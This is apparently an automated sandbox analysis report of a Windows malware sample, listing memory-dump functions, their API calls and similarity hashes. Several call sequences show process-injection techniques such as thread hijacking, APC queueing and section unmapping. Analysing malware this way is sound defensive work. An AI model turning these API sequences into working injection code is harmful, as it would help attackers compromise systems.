    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
